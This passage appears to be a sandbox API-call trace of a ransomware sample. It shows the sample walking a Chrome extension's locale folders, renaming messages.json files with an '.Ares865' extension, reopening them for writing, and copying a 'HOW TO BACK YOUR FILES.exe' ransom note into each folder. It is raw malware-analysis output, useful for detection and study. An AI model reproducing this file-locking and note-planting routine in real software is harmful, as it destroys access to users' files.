Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.Ares865") returned 165 [0102.613] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.614] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.615] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.618] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl" [0102.619] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl" [0102.619] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.619] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.619] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.620] GetLastError () returned 0x0 [0102.620] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb8d380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb8d380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.620] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.620] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.620] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.Ares865") returned 162 [0102.620] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.621] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.622] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.628] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no" [0102.628] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no" [0102.628] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.628] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.629] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.629] GetLastError () returned 0x0 [0102.629] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.629] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb8d380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb8d380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.629] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.629] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.630] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.Ares865") returned 162 [0102.630] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.631] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=159) returned 1 [0102.636] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl" [0102.636] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl" [0102.636] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.636] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.637] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.637] GetLastError () returned 0x0 [0102.637] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.637] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb8d380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb8d380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.637] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.637] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.637] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.Ares865") returned 162 [0102.638] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.639] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.642] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv" [0102.642] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv" [0102.642] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.643] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.643] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.643] GetLastError () returned 0x0 [0102.644] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb8d380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb8d380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.644] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.644] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.644] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.Ares865") returned 162 [0102.644] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.646] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.649] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt" [0102.649] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt" [0102.649] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.649] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.650] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.650] GetLastError () returned 0x0 [0102.650] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.650] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebb34e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebb34e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.650] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.650] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.650] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.Ares865") returned 162 [0102.651] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 